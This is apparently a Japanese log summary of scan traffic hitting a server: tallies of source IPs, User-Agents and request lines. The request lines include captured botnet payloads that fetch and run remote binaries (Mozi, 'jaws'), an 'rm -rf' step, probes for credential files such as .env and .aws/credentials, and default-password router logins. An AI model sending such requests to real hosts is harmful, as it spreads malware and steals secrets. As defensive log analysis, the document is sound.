1 159.203.136.160 United States
1 161.35.196.117 United States
2 162.142.125.224 United States
7 164.92.195.194 United States
2 167.71.133.68 United States
1 172.104.11.51 United States
3 172.105.128.11 United States
1 172.105.128.13 United States
1 179.43.177.243 Panama
1 183.136.225.32 China
1 185.190.24.108 Panama
2 192.155.90.118 United States
2 193.35.18.60 Bulgaria
1 193.35.18.65 Bulgaria
1 193.35.18.251 Bulgaria
4 195.144.21.56 Seychelles
1 205.210.31.34 United States
1 205.210.31.42 United States
1 209.141.36.231 United States
1 223.166.22.114 China

UserAgent一覧

件数 UserAgent
39 -
3 Go-http-client/1.1
3 Mozila/5.0
1 Mozilla/5.0 (Android; Mobile; rv:35.0) Gecko/35.0 Firefox/35.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.3
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
1 Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
22 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
1 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 \x03
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\xfb\x01
26 \x16\x03\x01
1 CONNECT blank[.]org:443 HTTP/1.1
2 CONNECT google[.]com:443 HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
22 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /04EL7x9OqnhURdfsJvgctrjCYV9 HTTP/1.1
1 GET /99vt HTTP/1.1
1 GET /99vu HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /__tests__/test-become/.env HTTP/1.0
2 GET /aaa9 HTTP/1.1
1 GET /aaaaaaaaaaaaaaaaaaaaaaaaaqr HTTP/1.1
2 GET /aab8 HTTP/1.1
2 GET /actuator/gateway/routes HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
2 GET /client/get_targets HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
8 GET /favicon.ico HTTP/1.1
1 GET /gate.php HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
4 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 5.255.111.128/jaws;sh+/tmp/jaws
1 GET /sitemap.xml HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
2 GET /upl.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 OPTIONS / HTTP/1.0
3 POST /HNAP1/ HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
1 PRI * HTTP/2.0